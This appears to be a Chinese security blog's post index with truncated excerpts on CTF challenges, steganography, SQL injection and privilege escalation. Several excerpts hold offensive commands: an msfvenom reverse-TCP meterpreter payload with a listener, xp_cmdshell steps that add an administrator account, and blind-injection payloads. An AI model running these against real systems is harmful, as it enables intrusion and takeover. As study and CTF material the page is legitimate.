- 博客(343)
- 收藏
- 关注
RSS订阅转载 re.S、 re.M
re.S是代表.可以匹配\n以及“ re.M是多行codeimport rea = '''asdfsafhellopass: 234455 worldafdsf '''b = re.findall('hello(.*?)world',a)c = re.findall('hello(.*?)world',a,re.S | r...
2018-01-15 23:58:00
298
转载 Sqlmap 中绕过空格拦截的12个脚本
转载于:https://www.cnblogs.com/xishaonian/p/8260382.html
2018-01-10 19:19:00
848
转载 1111111
都长大了,都变了。大学一个让我又厌烦又渴望的地方。说好的一起却留下了我一个。你喜欢的专业你喜欢的学校可是我好烦。没有你。我真的看不到前面的路。真的好渴望一种麻醉可以不用承担没有你的日子。转载于:https://www.cnblogs.com/xishaonian/p/8167227.html...
2018-01-01 14:21:00
274
转载 Node.js 反序列化漏洞远程执行代码(CVE-2017-5941)
2.1 摘要2.1.1 漏洞介绍漏洞名称: Exploiting Node.js deserialization bug for Remote Code Execution漏洞CVE id: CVE-2017-594漏洞类型: 代码执行Node.js存在反序列化远程代码执行漏洞,若不可信的数据传入unserrialize()函数,通过传递立即调用函数表达式(IIF...
2017-12-29 16:33:00
402
转载 python中使用XPath
转载自:https://www.cnblogs.com/gaochsh/p/6757475.htmlXPath在Python的爬虫学习中,起着举足轻重的地位,对比正则表达式 re两者可以完成同样的工作,实现的功能也差不多,但XPath明显比re具有优势,在网页分析上使re退居二线。XPath介绍:是什么? 全称为XML Path Language一种小型的查询语言说道XPa...
2017-12-27 02:15:00
128
转载 一次xxoo提权
数据库root权限。然并卵。看了一下phpinfo得知是mysql 5.0 的 然后想要通过udf之类的提权一波,结果一执行sql语句就被狗拦截了。然而数据库这条路是GG了OS 名称: Microsoft Windows Server 2008 R2 Enterprise 修补程序: 安装了 1 个修补程序。然后各种e...
2017-12-25 20:56:00
2467
转载 Nmap备忘单
#在推特上看到,感觉做的相当不错就转一波。目标规格开关例描述nmap 192.168.1.1扫描一个IPnmap 192.168.1.1 192.168.2.1扫描特定的IP地址nmap 192.168.1.1-254扫描一个范围...
2017-12-25 13:31:00
136
转载 浏览器神器--vimium
自从学会了正确的坐姿,坐在电脑一整天腰也不酸了、背也不痛了,精神倍棒吃嘛嘛香zuomeng.png但奈何使用鼠标久了,手腕、肩膀依旧疼痛。偶尔逛知乎,看到有人推荐chrome浏览器的vimium插件(火狐浏览器是vimperator),安装了使用了几天,真不愧是浏览器神器,好用到想哭,而且非常容易上手。下面让我们来认识一下...
2017-12-18 00:42:00
114
转载 bugku的一道图片隐写
可以看到图片是不完整的就联想到其高宽问题。使用winhex打开将高里面的01改成11get flag{He1I0_d4_ba1}转载于:https://www.cnblogs.com/xishaonian/p/8053835.html...
2017-12-17 23:16:00
376
转载 忘记密码了
CTF很狗。我所看到的解体思路,只是一个答案。搞不懂大牛的操作。题目:http://ctf5.shiyanbar.com/10/upload/根据源码得到两个信息一个管理员邮箱一个vim。发送到管理员的是看不到,但是别的可以。然后联想到刚才的vim在vim不正常退出的情况下就会产生一个swp文件。那么这个会不会是这样呢?http://c...
2017-10-26 08:14:00
102
转载 Msf提权步骤
1、生成反弹木马(脚本,执行程序)msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -o shell.exe2、MSF接受设置1 use exploit/multi/handle...
2017-10-24 03:24:00
749
转载 zip伪加密
简单的话来阐述 zip伪协议的意思是说本来不需要密码的zip文件然后通过修改标志位,然后就可以达到有密码的效果对吗?但是他实际是没有密码。一个 ZIP 文件由三个部分组成: 压缩源文件数据区+压缩源文件目录区+压缩源文件目录结束标志 详情:http://blog.csdn.net/wclxyn/article/details/7288994实例说明...
2017-10-23 07:32:00
96
转载 in linux system of ftp command
一口流利的english title常用命令:ftp baidu.comftp>lsftp>cddirectoryftp>get filename 下载ftp>put filename 上传转载于:https://www.cnblogs.com/xishaonian/p/7712981.html...
2017-10-23 04:22:00
87
转载 DFI、DPI技术
废话:因为xxoo的缘故接触到这个设备。但是就是单纯的去看并没有去研究它是个啥玩意。刚才无聊就百度科普了一波。DFI以及DPI简单通俗以自己的理解来将就是网络带宽的一种检测技术。既然是检测技术也就是说其可以进行查看流量情况。那么最简单的企业应用也就是拿来看DDOS攻击情况之类的了。介绍: DFI(Deep/Dynamic Flow Inspection,...
2017-10-23 02:00:00
949
转载 隐写术总结以及案例分享
1.拿到一个隐写的题目,首先打开一个正常的文件与之进行对比。看一下十六进制头会不会一样。确定好其正确的后缀 案例: 一个gif文件使用hexwin打开开头是39 61并非gif的。然后我们在前面加一个gif89a的hex值试试。然后成功拿到flag2.将文件捆绑在一个图片当中,使用bindwalk、format即可解决3.三色素进行隐藏。直接使用Stegsol...
2017-10-22 06:14:00
409
转载 结合order by 解CTF某题
真tmd不容易<?phperror_reporting(0);if (!isset($_POST['uname']) || !isset($_POST['pwd'])) { echo '<form action="" method="post">'."<br/>"; echo '<input name="uname" typ...
2017-10-21 07:55:00
210
转载 利用order by 进行盲注
0x01 利用场景登录代码:$username = $_POST['username'];$password = $_POST['password'];if(filter($username)){ //过滤括号}else{ $sql="SELECT * FROM admin WHERE username='".$username."'"; ...
2017-10-21 07:02:00
219
转载 一次简单的ctf SQL注入绕过
注入地址:http://103.238.227.13:10087/index.php?id=1//过滤sql$array = array('table','union','and','or','load_file','create','delete','select','update','sleep','alter','drop','truncate','from','max...
2017-10-19 16:13:00
411
转载 PHP error_reporting() 函数
实例规定不同的错误级别报告:<?php // 关闭错误报告 error_reporting(0); // 报告 runtime 错误 error_reporting(E_ERROR | E_WARNING | E_PARSE); // 报告所有错误 error_reporting(E_ALL); // 等同 error_repor...
2017-10-18 02:01:00
82
转载 实验吧 web题writeup
1.http://ctf5.shiyanbar.com/web/wonderkun/web/index.html用户名我输入:or'xor"and"select"union'结果给我过滤成了:可见该过滤的都过滤了,但是唯独单引号以及双引号都没过滤。这里就可以想到万能密码了。猜想其sql语句为:select * from admin where username = ' '...
2017-10-16 01:21:00
82
转载 tomcat 远程命令执行漏洞复现
影响范围Apache Tomcat 7.0.0 - 7.0.81不受影响的版本Apache Tomcat 8.xApache Tomcat 9.x漏洞分析在Tomcat安装目录下的配置文件web.xml中的org.apache.catalina.servlets.DefaultServlet方法下如果该方法有如下代码,即表示Tomcat已开启PUT方法&l...
2017-10-12 02:05:00
260
转载 猥琐百度杯猥琐CTF
其实不难,但是作为我这个代码菜鸡+脑洞菜鸡+黑阔菜鸡而言确实挺难。题目源码: <?php error_reporting(0);session_start();require('./flag.php');if(!isset($_SESSION['nums'])){ $_SESSION['nums'] = 0; $_SESSION['time'...
2017-10-11 22:01:00
128
转载 CTF之文件包含的猥琐思路
From:i春秋 百度杯”CTF一:<?php include "flag.php"; //包含flag.php这个文件 $a = @$_REQUEST['hello']; //$a这个变量请求变量hello的值 if(!preg_match('/^\w*$/',$a )){ //正则表达式,匹配字符串,\w表示字符+数字+下划线,*代表有若干个\w字符组成。...
2017-10-11 01:41:00
886
转载 python正则表达式
所使用模块:re对于Python使用正则一般都是先将正则表达式的字符串形式编译然后进行实例化。如下进行一个最简单的正则匹配#encoding=utf-8#by defimport repattern = re.compile(r'hello') #实例化if re.match('hello world'): #使用pattern去匹配字符串 pr...
2017-10-09 01:42:00
76
转载 猥琐的隐写术
文件:https://files.cnblogs.com/files/xishaonian/apple.rar下载回来之后是一张图片的二维码,使用QR_Research对其进行扫描得到如下内容;\u7f8a\u7531\u5927\u4e95\u592b\u5927\u4eba\u738b\u4e2d\u5de5经过解码后为:然后才知道这个是什么当铺密码。就是有几个点...
2017-10-08 21:20:00
95
转载 大牛总结的Linux提权Exp合集
https://github.com/SecWiki/linux-kernel-exploits#CVE #Description #Kernels CVE-2017-1000367 [Sudo](Sudo 1.8.6p7 - 1.8.20) CVE-2017-7494 [Samba Remote execution](Samba 3.5.0-4.6....
2017-10-07 02:24:00
804
转载 CTF中图片隐藏文件分离方法总结
前言 可以使用winhex之类的工具先行分析其是否为图片,可以看其头部信息,还有就是JPG图片有一个特性最后的应用数据块为FF E0 活着直接使用binwalk看看图片下有什么鬼玩意儿的。binwalk分离 命令:binwalk -e 图片路径foremost分离 命令:foremost 图片地址 #会在图片地址的目录下生成一个outp...
2017-10-06 21:48:00
2373
转载 解压报错gzip: stdin: not in gzip format tar: Child returned status 1 tar: Error is not recoverable: exit...
在部署tomcat的环境搞JDK的时候出现这个问题。分享一下。解压命令:tar -zvxfmemcached-1.4.34.tar.gz遇到了一个问题, gzip: stdin: not in gzip format tar: Child returned status 1 tar: Error is not recoverable: exiting now...
2017-10-06 03:03:00
233
转载 CTF中常见Web源码泄露总结
目录00x1 .ng源码泄露00x2 git源码泄露00x3 .DS_Store文件泄漏00x4 网站备份压缩文件00x5 SVN导致文件泄露00x6 WEB-INF/web.xml泄露00x7 CVS泄漏工具推荐参考0x01 .hg源码泄漏漏洞成因: hg init的时候会生成.hg<span class="pln">e<...
2017-10-05 03:03:00
167
转载 CTF之PHP黑魔法总结
继上一篇php各版本的姿势(不同版本的利用特性),文章总结了php版本差异,现在在来一篇本地日记总结的php黑魔法,是以前做CTF时遇到并记录的,很适合在做CTF代码审计的时候翻翻看看。一、要求变量原值不同但md5或sha1相同的情况下1.0e开头的全部相等(==判断)240610708 和 QNKCDZO md5值类型相似,但并不相同,在”==”相等操作符的运算下,结果返回...
2017-10-05 02:17:00
466
转载 图片隐写分离
提供下载:https://files.cnblogs.com/files/xishaonian/yanhuo.rar工具:用bindwalkforemost得到的时候是rar格式的,首先先判断一下其是否格式正确,直接丢Winhex查看发现是JFIF即为图片格式。然后改为jpge之后图片显示正常然后使用kali下的binwalk检测是否嵌入了数据...
2017-10-04 23:32:00
2157
转载 phpMyadmin各版本漏洞
一: 影响版本:3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3 ANYUN.ORG 概述:PhpMyAdmin存在PREGREPLACEEVAL漏洞 利用模块:exploit/multi/http/phpmyadminpregreplace CVE: CVE-2013-3238二: 影响版本:phpMyAdmin v3.5....
2017-10-04 20:39:00
1088
转载 python 多线程
Python模块:threading目录00x1 多线程基础讲解00x2 简单多线程案例00x3 锁的概念00x4习题作业00x1 多线程基础讲解_↑↑↑↑↑↑↑↑↑↑↑↑↑要使用多线程的函数可以实例化一个Thread对象,每个Thread对象代表着一个线程,可以通过start()方法,开始运行。t = threading.Thread(target...
2017-10-03 22:43:00
98
转载 order by name 注入
order by name idid是一个注入点可以利用if语句进行注入order by name ,if(1=1,1,select 1 from information_schema.tables)如果为假则执行第二条语句,要么报错要么没有返回值。这属于盲注的一种。转载于:https://www.cnblogs.com/xishaonian/p/7618376.html...
2017-10-02 01:34:00
215
转载 Python lambda
其实就可以当作表达式的意思。比如g = lambda x:x+1"""x为入口参数,x+1为函数体等价于下面这个函数的定义def g(x): return x+1"""可以当作一个表达式为每次加1,那个分号可看作等于。>>> g = lambda x:x+1>>> g(2)3&...
2017-09-30 01:31:00
78
转载 Python os.popen() 方法
简述就是新建一个管道执行一个命令。方法是os.popen(命令,权限,缓冲大小)比如a = 'mkdir def'b = os.popen(a,'r',1)print b就是等同于使用命令去创建了一个def的文件夹,r是其权限,1是缓冲大小。第二个第三个参数都是可选的。详细分析:os.popen() 方法用于从一个命令打...
2017-09-29 19:21:00
376
转载 你和大牛差了啥
mmp。无时无刻不在想和大牛差在哪里了。别人为什么可以那么牛逼而你tmd那么菜!整个人顿时都颓废了。啥事儿不想干。后来想了想感情就是他比较黑吧。转载于:https://www.cnblogs.com/xishaonian/p/7594705.html...
2017-09-26 01:34:00
75
转载 Error: failure: repodata/repomd.xml from fedora: [Errno 256] No more mirrors to try.
记录一个小问题,重新买的linux换yum源的时候一直提示:Error: failure: repodata/repomd.xml from fedora: [Errno 256] No more mirrors to try.一直说那个XML文件不存在,以为是yum源是去读取xml当中的数据然后去下载。确实自己去访问也是404.还以为是这阵子开会yum源都搞不能用了怎么...
2017-09-25 13:27:00
537
转载 1433修复命令大全提权错误大全_cmd_shell组件修复
net user SQLDebugger list /addnet localgroup administrators SQLDebugger /addError Message:未能找到存储过程 'master..xp_cmdshell'。修复法:很通用的,其实碰到 其他126 127的都可以一起修复,除了xplog70.dll其他的都可以用这命令修复[/post]xp_cm...
2017-09-19 21:29:00
228
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人